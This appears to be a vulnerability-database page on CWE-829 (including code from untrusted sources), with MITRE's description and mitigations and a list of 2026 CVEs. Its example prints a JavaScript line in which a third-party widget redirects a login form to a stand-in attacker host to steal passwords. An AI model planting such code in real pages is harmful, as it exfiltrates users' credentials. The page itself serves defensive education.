Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-829 (从非可信控制范围包含功能例程) — Vulnerability Class 110

110 vulnerabilities classified as CWE-829 (从非可信控制范围包含功能例程). AI Chinese analysis included.

CWE-829 represents a critical software weakness where applications import or execute functionality from sources outside their intended control sphere, such as unverified third-party libraries or external APIs. Attackers typically exploit this vulnerability by compromising the external source or manipulating the inclusion mechanism to inject malicious code, thereby gaining unauthorized execution privileges or causing system compromise. This often occurs when developers blindly trust dependencies without verifying their integrity or origin. To mitigate this risk, developers must implement strict dependency management practices, including rigorous code review processes and the use of cryptographic signatures to verify the authenticity of included components. Additionally, employing sandboxing techniques and maintaining a minimal attack surface by removing unnecessary external dependencies can significantly reduce the likelihood of successful exploitation, ensuring that only trusted, vetted functionality is integrated into the application’s core logic.

MITRE CWE Description
The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.
Common Consequences (1)
Confidentiality, Integrity, AvailabilityExecute Unauthorized Code or Commands
An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere, such as a malicious web site. This could enable the injection of malware, information exposure by granting excessive privileges or…
Mitigations (5)
Architecture and DesignUse a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
Architecture and DesignWhen the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability.
Architecture and DesignFor any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Architecture and Design, OperationRun the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For ex…
Effectiveness: Limited
Architecture and Design, OperationRun your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database ad…
Examples (1)
This login webpage includes a weather widget from an external website:
<div class="header"> Welcome! <div id="loginBox">Please Login: <form id ="loginForm" name="loginForm" action="login.php" method="post"> Username: <input type="text" name="username" /> <br/> Password: <input type="password" name="password" /> <input type="submit" value="Login" /> </form> </div> <div id="WeatherWidget"> <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script> </div> </div>
Bad · HTML
...Weather widget code.... document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";
Attack · JavaScript
CVE IDTitleCVSSSeverityPublished
CVE-2026-45184 Kdenlive 26.04.1前代理参数注入漏洞 — Kdenlive 6.5 Medium2026-05-09
CVE-2026-43571 OpenClaw < 2026.4.10 - Untrusted Workspace Plugin Shadow Resolution in Channel Setup — OpenClaw 8.8 High2026-05-05
CVE-2026-43569 OpenClaw < 2026.4.9 - Untrusted Provider Plugin Auto-enablement via Workspace Provider Auth — OpenClaw 8.8 High2026-05-05
CVE-2026-43003 OpenStack ironic-python-agent 安全漏洞 — ironic-python-agent 8.0 High2026-05-01
CVE-2026-41396 OpenClaw < 2026.3.31 - Environment Variable Override of Plugin Trust Root — OpenClaw 7.8 High2026-04-28
CVE-2026-42510 OpenStack Ironic 安全漏洞 — Ironic 6.6 Medium2026-04-28
CVE-2026-41355 OpenShell < 2026.3.28 - Arbitrary Code Execution via Mirror Mode Sandbox File Conversion — OpenClaw 7.3 High2026-04-23
CVE-2026-41336 OpenClaw < 2026.3.31 - Arbitrary Hook Code Execution via OPENCLAW_BUNDLED_HOOKS_DIR Environment Variable Override — OpenClaw 7.8 High2026-04-23
CVE-2026-6859 Instructlab: instructlab: arbitrary code execution due to hardcoded `trust_remote_code=true` — Red Hat Enterprise Linux AI (RHEL AI) 3 8.8 High2026-04-22
CVE-2026-40903 Goshs - ArtiPACKED Vulnerability – GitHub Actions Credential Persistence — goshs 9.1 Critical2026-04-21
CVE-2026-41295 OpenClaw < 2026.4.2 - Untrusted Workspace Channel Shadow Code Execution during Built-in Channel Setup — OpenClaw 7.8 High2026-04-20
CVE-2026-41253 iTerm2 安全漏洞 — iTerm2 6.9 Medium2026-04-18
CVE-2026-6482 Local Privilege Escalation via OpenSSL configuration file in Insight Agent — Insight Agent 7.8AIHighAI2026-04-17
CVE-2026-40959 Luanti 安全漏洞 — Luanti 9.3 Critical2026-04-16
CVE-2026-40313 PraisonAI: ArtiPACKED Vulnerability via GitHub Actions Credential Persistence — PraisonAI 9.1 Critical2026-04-14
CVE-2026-40154 PraisonAI Affected by Untrusted Remote Template Code Execution — PraisonAI 9.3 Critical2026-04-09
CVE-2026-1342 Security Vulnerabilities have been found in IBM Verify Identity Access and IBM Security Verify Access — Verify Identity Access Container 8.5 High2026-04-07
CVE-2026-32920 OpenClaw < 2026.3.12 - Arbitrary Code Execution via Auto-Discovery of Workspace Plugins — OpenClaw 8.4 High2026-03-31
CVE-2026-3991 Elevation of Privileges in Symantec Data Loss Prevention Windows Endpoint — Data Loss Prevention 7.8 High2026-03-30
CVE-2025-55273 HCL Aftermarket DPC is affected by Cross Domain Script Include vulnerability — Aftermarket DPC 4.3 Medium2026-03-26
CVE-2026-22217 OpenClaw 2026.2.22 < 2026.2.23 - Arbitrary Binary Execution via $SHELL Environment Variable Trusted Prefix Fallback — OpenClaw 6.1 Medium2026-03-18
CVE-2026-4295 Arbitrary code execution via crafted project files in Kiro IDE — Kiro IDE 7.8 High2026-03-17
CVE-2026-4255 DLL Injection Privilege Escalation — TR-VISION HOME 7.8AIHighAI2026-03-16
CVE-2026-28135 WordPress Royal Elementor Addons plugin <= 1.7.1052 - Other vulnerability Type vulnerability — Royal Elementor Addons 8.2 High2026-03-05
CVE-2026-1628 Mattermost allows external websites to open within the app, exposing preload functionality to non-trusted sites. — Mattermost 4.6 Medium2026-03-02
CVE-2026-28372 GNU Inetutils 安全漏洞 — inetutils 7.4 High2026-02-27
CVE-2026-27941 OpenLIT Vulnerable to Remote Code Execution and Secret Exposure via Misuse of `pull_request_target` in GitHub Actions Workflows — openlit 10.0 Critical2026-02-26
CVE-2026-26974 Sylde has Improper Control of Generation of Code — Slyde 9.8AICriticalAI2026-02-20
CVE-2026-26959 ADB Explorer Vulnerable to RCE via Insufficient Input Validation — ADB-Explorer 7.8 High2026-02-19
CVE-2026-26079 Roundcube Webmail 安全漏洞 — Webmail 4.7 Medium2026-02-11

Vulnerabilities classified as CWE-829 (从非可信控制范围包含功能例程) represent 110 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.